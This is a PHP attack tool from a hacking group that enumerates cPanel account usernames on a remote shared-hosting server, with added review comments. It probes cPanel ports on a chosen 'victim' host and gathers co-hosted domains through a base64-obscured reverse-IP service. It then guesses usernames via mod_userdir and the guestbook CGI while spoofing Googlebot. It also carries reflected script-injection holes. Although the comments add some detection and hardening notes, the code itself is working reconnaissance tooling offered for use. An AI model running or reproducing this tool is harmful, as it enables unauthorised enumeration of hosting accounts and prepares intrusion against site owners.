<? session_start(); ?>
<style>
a:link {color:#FF0000; text-decoration:none;}
a:visited {color:#63C; text-decoration:none;}
a:hover {color:#669900; text-decoration:none;}
.ht{ background:#eae9e9; padding:20px; border-radius:20px; font-size:large}
</style>
<title> Hackteach Lovers Remote cPanel domains and user Detector </title>
<div align="center" class="ht">Hackteach Lovers Remote cPanel domains and user Detector <a href="https://www.facebook.com/groups/hackteach.org/">www.hackteach.org</a></div>
<?php
/*
Licence:
co[d]ed by Cold z3ro
FB : https://www.facebook.com/groups/hackteach.org/
homepage : www.hackteach.org
Description:
* This program collects the account usernames for all sites hosted on one
server. It works remotely, so it does not need to run on the same host.
How to use:
* link the file with variable "h" with domain name or server ip
like the following cPanel.php?h=victemhost.com .
* some good stuff :
1. https://www.facebook.com/photo.php?fbid=867643286593184
2. https://www.facebook.com/photo.php?fbid=867643436593169
3. https://www.facebook.com/photo.php?fbid=867643459926500
*/
// Raise runtime limits before any work is done.
// Xdebug recursion guard: set to a very large value (only relevant when Xdebug is loaded).
ini_set('xdebug.max_nesting_level', 10000000000000000);
// Memory ceiling: 1024 * 1024 * 1024 bytes (1 GiB).
ini_set('memory_limit', 1024 * 1024 * 1024);
// NOTE(review): "on" is not a number of seconds; presumably meant to lift the time limit.
// Confirm how the running PHP version interprets this value.
ini_set("max_execution_time", "on");
/**
 * Probe a host on three HTTPS ports and record the first one that answers in the session.
 *
 * The host is normalised with correctit(), then iscPanel(..., "port") is called for each
 * port in order. The first port that returns a body is stored in $_SESSION['port'] together
 * with the host in $_SESSION['http'], and the loop stops. If neither session value is set
 * afterwards the script terminates through die().
 *
 * NOTE(review): 2083, 2087 and 2096 are commonly the TLS ports of cPanel, WHM and Webmail.
 * The "port" branch of iscPanel() only checks that something answered over HTTPS, so the
 * "cPanel server" message is an inference from the port number, not from the response content.
 * NOTE(review, defensive): on the probed host this appears as HTTPS requests for "/" on each
 * of these ports in quick succession from the address of the server running this script.
 *
 * @param string $http Host name, IP address or http(s) URL supplied by the requester.
 * @return void Results are delivered through $_SESSION and echoed HTML.
 */
function httpsPort($http)
{
$ports = array('2083','2087','2096');
$http = correctit($http);
foreach($ports as $key => $port)
{
if(iscPanel($http, $port, "port") == true)
{
// First answering port wins; remember it and the normalised host for later requests.
$_SESSION['port'] = $port;
$_SESSION['http'] = $http;
echo "[+] cPanel server => Port:".$_SESSION['port']."<br>[+] checking some fetures..<br>"; break;
}else{
// NOTE(review): $port comes from the fixed list above, so this echo carries no user input.
echo "ERR port:$port not reachable<br>";
}
}
// NOTE(review): these keys are read without isset(); when no port answered and the caller
// has unset them, PHP reports an undefined-index notice before the die() below.
if (!$_SESSION['port'] || !$_SESSION['http'])
{
die ('Not cPanel server !! <a href="https://www.facebook.com/m.z3ro">report bug to developer</a> if its realy cPanel server');
}
}
/**
 * Print every fragment of $http that lies between the delimiters $svale and $evale.
 *
 * The delimiters are concatenated into a regular expression (";" as pattern delimiter,
 * flags "i" and "s"). Each full match is passed through strip_tags(), text matching
 * "Reverse ... Date" is removed, and the remainder is echoed followed by a newline.
 * When nothing matches, the script terminates through die() with a message that also
 * closes the caller's open textarea.
 *
 * NOTE(review): $svale and $evale are not passed through preg_quote(), so they are
 * interpreted as regex syntax; the visible caller passes fixed HTML fragments.
 * NOTE(review): the "@" operators hide warnings, including the one raised when $http is
 * not a string because the preceding fetch failed.
 * NOTE(review): the echoed text comes from a remote page and is only tag-stripped, not
 * HTML-escaped, before it is written into the caller's textarea.
 *
 * @param string $http  Text to search (the caller passes a fetched page body).
 * @param string $svale Start delimiter, used as regex source.
 * @param string $evale End delimiter, used as regex source.
 * @return void The function has no return statement; output is echoed.
 */
function zip($http, $svale, $evale)
{
@preg_match_all(';'.$svale.'(.*?)'.$evale.';is', $http, $zht);
if(count($zht[0]) ==0)
{
die("HTcore Error:\n\nCan't get server domains in this version\nBuy the full code version from devloper\nhttps://www.facebook.com/m.z3ro</textarea><form>");
}else{
// $zht[0] holds the full matches, delimiters included; strip_tags() removes the markup.
foreach ($zht[0] as $key => $domain)
{
echo @preg_replace('/(Reverse.+?)+(Date)/i','',@strip_tags($domain)),"\n";
}
}
}
/**
 * Look up the host names that share an IP address through a third-party reverse-IP page
 * and print them.
 *
 * The base64 literal decodes to "http://www.viewdns.info/reverseip/?host="; $htip and
 * "&t=1" are appended, the page is fetched through iscPanel(..., "hostbydomains") and the
 * table cells are printed by zip().
 *
 * NOTE(review): the lookup URL is stored base64-encoded, which keeps the third-party
 * service name out of a plain-text search of this file. The request is sent over plain
 * HTTP, and $htip is appended without URL encoding.
 * NOTE(review): zip() has no return value, so $returndomains is always null here and this
 * function returns nothing; the host names reach the page only through zip()'s echo.
 *
 * @param string $htip IP address to look up.
 * @return mixed Nothing in practice (see note above).
 */
function htextra($htip)
{
// use only in the free version
$extract = base64_decode("aHR0cDovL3d3dy52aWV3ZG5zLmluZm8vcmV2ZXJzZWlwLz9ob3N0PQ==") .$htip. "&t=1";
$returndomains = zip(iscPanel($extract, "", "hostbydomains"), '</td></tr><tr><td>', '</td><td align="center">');
if($returndomains !="")
{
return $returndomains;
}
}
/**
 * Send one HTTP(S) request with cURL and interpret the response according to $type.
 *
 * Branches selected by $type:
 *  - "hostbydomains": fetch the URL in $http and return the response body.
 *  - "zguestbook":    fetch the URL in $http; true when the status is 200 and the body
 *                     matches $port used as a regular expression, otherwise false.
 *  - "zuserdir":      fetch the URL in $http; true when the status is 200 and the body
 *                     does not contain "404 Not Found", otherwise false.
 *  - "port":          fetch https://$http:$port/; true when a non-empty body comes back.
 *  - "moduserdir":    fetch http://$http/~operator/; true when the status is 403.
 *  - "guestbook":     fetch http://$http/cgi-sys/guestbook.cgi; true when the status is
 *                     200 and the body contains "No Username given".
 * When the request fails, the body is empty, or $type is not listed, execution falls
 * through to curl_close() and the function returns nothing (null).
 *
 * NOTE(review): certificate and host-name verification are both switched off, so the
 * answers from HTTPS ports are not authenticated.
 * NOTE(review): every branch that returns does so before curl_close(); the handle is
 * closed explicitly only on the fall-through path.
 * NOTE(review, defensive): three branches present a Googlebot user agent. Requests with
 * that user agent from an address that does not belong to Google are a usable log signal
 * on the receiving server.
 *
 * @param string $http Host name, or a complete URL for the "hostbydomains"/"z*" branches.
 * @param string $port Port number for "port"; regex source for "zguestbook"; unused otherwise.
 * @param string $type Branch selector, see above.
 * @return mixed Body string, true, false, or nothing, depending on the branch.
 */
function iscPanel($http, $port, $type)
{
$curl = curl_init();# Create the cURL handle
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER,0);# Certificate chain is not verified (self-signed certificates are accepted)
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST,0);# Certificate name is not compared with the requested host
curl_setopt($curl, CURLOPT_HEADER,0);# Do not include response headers in the output
curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);# curl_exec() returns the body instead of printing it
curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 10);# Give up connecting after 10 seconds
curl_setopt($curl, CURLOPT_TIMEOUT, 30);# Give up on the whole transfer after 30 seconds
switch($type)
{
case "hostbydomains";
{
curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');
curl_setopt($curl, CURLOPT_URL, $http);
// NOTE(review): curl_exec() runs twice, so the remote page is requested twice and the
// body returned is the one from the second request.
if (curl_exec($curl))
{
return curl_exec($curl);
}
}break;
case "zguestbook";
{
curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');
curl_setopt($curl, CURLOPT_URL, $http);
$execute = curl_exec($curl);
$code = curl_getinfo($curl, CURLINFO_HTTP_CODE);
if ($execute)
{
$code = curl_getinfo($curl, CURLINFO_HTTP_CODE);
// NOTE(review): $port is placed into the pattern without preg_quote(); the visible caller
// passes a string derived from a host name here.
if($code == "200" && preg_match("#".$port."#i",$execute))
{
return true;
}else{
return false;
}
}
}break;
case "zuserdir";
{
curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');
curl_setopt($curl, CURLOPT_URL, $http);
$execute = curl_exec($curl);
$code = curl_getinfo($curl, CURLINFO_HTTP_CODE);
if ($execute)
{
$code = curl_getinfo($curl, CURLINFO_HTTP_CODE);
// A 200 whose body still says "404 Not Found" is treated as a miss.
if($code == "200" && !preg_match("#404 Not Found#i",$execute))
{
return true;
}else{
return false;
}
}
}break;
case "port";
{
curl_setopt($curl, CURLOPT_URL, "https://".$http.":".$port."/");
// Any non-empty body counts; status code and content are not inspected.
if (curl_exec($curl))
{
return true;
}
}break;
case "moduserdir";
{
curl_setopt($curl, CURLOPT_URL, "http://".$http."/~operator/");
if (curl_exec($curl))
{
$code = curl_getinfo($curl, CURLINFO_HTTP_CODE);
// Only a 403 for this fixed path is reported as true.
if($code == "403")
{
return true;
}else{
return false;
}
}
}break;
case "guestbook";
{
curl_setopt($curl, CURLOPT_URL, "http://".$http."/cgi-sys/guestbook.cgi");
// NOTE(review): this reads the status before any transfer has happened; the value is
// overwritten below.
$code = curl_getinfo($curl, CURLINFO_HTTP_CODE);
if (curl_exec($curl))
{
$code = curl_getinfo($curl, CURLINFO_HTTP_CODE);
// NOTE(review): the second curl_exec() repeats the request; the status checked is from the
// first request, the body from the second.
if($code == "200" && preg_match(";No Username given;i",curl_exec($curl)))
{
return true;
}else{
return false;
}
}
}break;
}
curl_close($curl);
}
/**
 * Reduce a user-supplied target to a bare host name.
 *
 * Input whose trimmed form begins with "http://" or "https://" is handed to parse_url()
 * (untrimmed, as given) and only the host component is returned. Any other input is
 * returned trimmed and otherwise unchanged; no validation is applied to it.
 *
 * @param string $http Host name, IP address or http(s) URL.
 * @return mixed Host component, or the trimmed input.
 */
function correctit($http)
{
$trimmed = trim($http);
foreach (array("http://", "https://") as $scheme)
{
// A prefix match at offset 0 means the value is a URL with one of the two schemes.
if (strncmp($trimmed, $scheme, strlen($scheme)) === 0)
{
return parse_url($http, PHP_URL_HOST);
}
}
return $trimmed;
}
// First stage: triggered by the "h" query parameter. Resolves the named host, shows cached
// results when it is the host already stored in the session, otherwise probes it again.
// NOTE(review): the page has no authentication. Whoever can reach this file can make the
// hosting server send DNS lookups and HTTP(S) requests to a host of their choosing, so its
// presence on a web server is worth treating as a sign of abuse or compromise.
if(isset($_GET['h']))
{
$serverip = gethostbyname(correctit($_GET['h']));
// NOTE(review): $_SESSION['htip'] is read without isset(); on a fresh session this raises
// a notice and compares against an empty string.
if($serverip == trim($_SESSION['htip']))
{
if (isset($_POST['destroy']))
{
// NOTE(review): HTTP_HOST and REQUEST_URI are request-controlled and are written
// unescaped into a JavaScript string below (reflected script injection).
$pagedirectlink = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
unset($_SESSION['htip']);
unset($_SESSION['http']);
die ("<script> window.location='".$pagedirectlink."' </script>");
}
echo $_SESSION['http'] ." This domain has been used for checking ". $_SESSION['htip'] ." server<br>
Start over <form method='POST'><input type='submit' name='destroy' value='destroy'></form>
<br>Results:<br>";
// NOTE(review): the stored results are HTML fragments built from posted host names and
// are printed as-is.
print_r($_SESSION['result'][$serverip]);
exit;
}else{
// Different host than last time: forget the previous target before probing.
unset($_SESSION['htip']);
unset($_SESSION['http']);
unset($_SESSION['port']);
}
// The string concatenated to the call result is discarded; httpsPort() echoes its own output.
httpsPort($_GET['h'])."<br>";
if($_SESSION['port'] && $_SESSION['http'])
{
// Two fixed-path requests decide which of the follow-up links is offered.
if(iscPanel($_SESSION['http'], "", "moduserdir")== true)
{
echo "<br>[+] mod_userdir avalible <a href='?htc=userdir'>[ USE ]</a><br>";
}else{
echo "<br>[+] mod_userdir not avalible<br>";
}
if(iscPanel($_SESSION['http'], "", "guestbook")== true)
{
echo "[+] cPanel guestbook avalible <a href='?htc=guestbook'>[ USE ]</a>";
}else{
echo "<br>[+] cPanel guestbook not avalible<br>";
}
//gethostbyname($_SESSION['http']);
}else{
// NOTE(review): httpsPort() already calls die() when either session value is missing, so
// this branch looks unreachable.
die("HTcore Error: server is not attackable");
}
}
// Second stage: selected by the "htc" query parameter. Both cases take a list of host names,
// derive candidate account names from each one and test them against the server whose IP
// address is kept in the session.
// NOTE(review): $_GET['htc'] and $_SESSION['http'] are read without isset(); without a
// prior first-stage run gethostbyname() receives an unset value.
// NOTE(review, defensive): candidates are the first 3 to 8 characters of the first label of
// each host name with hyphens removed, so an account name that is not such a prefix is not
// found by these loops. Per host name the probed server sees up to six requests with a
// growing prefix and a Googlebot user agent. Disabling per-user directories (Apache
// "UserDir disabled") and removing the legacy guestbook CGI take away the two response
// differences this code relies on.
$action = $_GET['htc'];
$_SESSION['htip'] = gethostbyname($_SESSION['http']);
$htip = $_SESSION['htip'];
// Hits of the current request only; the session entry is overwritten with this array.
$randArr = array();
switch($action)
{
case 'userdir':
{
echo "[+] Webserver : <a href='http://". $htip ."' target='_new'> ". $htip ." </a>";
echo "<br>[+] Attack type: mod_userdir <br><div align='center'><form method='POST'><textarea cols='50' rows='10' name='https' style='border: 1px dotted #000;' size='29' >";
if(empty($_POST['https']))
{
// No list posted yet: pre-fill the textarea from the reverse-IP lookup.
echo htextra($htip);
}else{
// NOTE(review): posted text is echoed without htmlspecialchars(); a closing textarea tag
// in the input breaks out of the field (reflected script injection).
echo $_POST['https'];
}
echo"</textarea><br><input type='submit' name='zext'></form></div>";
if (isset($_POST['zext']))
{
if ($_POST['https'] =="")
{
die('Enter weblinks');
}
// Row background colour, alternated per input line.
$s = '#9dc4d1';
foreach (explode("<br />",nl2br($_POST['https'])) as $weblink)
{
$https = correctit($weblink);
if(filter_var("http://".$https, FILTER_VALIDATE_URL))
{
$httpd = str_replace('-','',$https);
$users = explode('.',$httpd);
for ($i = 3; $i <= 8; $i++)
{
$htips = $htip;
$user = substr($users[0],0,$i);
// Request goes to the server's IP address, not to the listed host name.
$http = "http://".$htips."/~".$user."/";
if(iscPanel($http, "", "zuserdir")==true)
{
// NOTE(review): $https has passed FILTER_VALIDATE_URL only; it is not HTML-escaped before
// being echoed and stored in the session.
$result ="<div style='background:".$s."'>".$https .":". $user."</div>";
$randArr[] = $result;
$_SESSION['result'][$htip] =$randArr;
echo $result;
// Stop at the first candidate that is reported as a hit.
break;
}
}
}
$s = $s == '#eae9e9' ? '#9dc4d1' : '#eae9e9' ;
}
}
}
break;
///
// Same flow as the 'userdir' case; only the probed URL and the iscPanel() branch differ.
case 'guestbook':
{
echo "[+] Webserver : <a href='http://". $htip ."' target='_new'> ". $htip ." </a>";
echo "<br>[+] Attack type: guestbook <br><div align='center'><form method='POST'><textarea cols='50' rows='10' name='https' style='border: 1px dotted #000;' size='29' >";
if(empty($_POST['https']))
{
echo htextra($htip);
}else{
// NOTE(review): unescaped echo of posted text, as in the 'userdir' case.
echo $_POST['https'];
}
echo"</textarea><br><input type='submit' name='zext'></form></div>";
if (isset($_POST['zext']))
{
if ($_POST['https'] =="")
{
die('Enter weblinks');
}
$s = '#9dc4d1';
foreach (explode("<br />",nl2br($_POST['https'])) as $weblink)
{
$https = correctit($weblink);
if(filter_var("http://".$https, FILTER_VALIDATE_URL))
{
$httpd = str_replace('-','',$https);
$users = explode('.',$httpd);
for ($i = 3; $i <= 8; $i++)
{
$htips = $htip;
$user = substr($users[0],0,$i);
$http = "http://".$htips."/cgi-sys/guestbook.cgi?user=".$user;
// The candidate is also passed as $port, which iscPanel() uses as the pattern to look
// for in the response body.
if(iscPanel($http, $user, "zguestbook")==true)
{
$result ="<div style='background:".$s."'>".$https .":". $user."</div>";
$randArr[] = $result;
$_SESSION['result'][$htip] =$randArr;
echo $result;
break;
}
}
}
$s = $s == '#eae9e9' ? '#9dc4d1' : '#eae9e9' ;
}
}
}
break;
}
?>
<div align="center" style="padding:25px;">co[d]ed by Cold z3ro</div>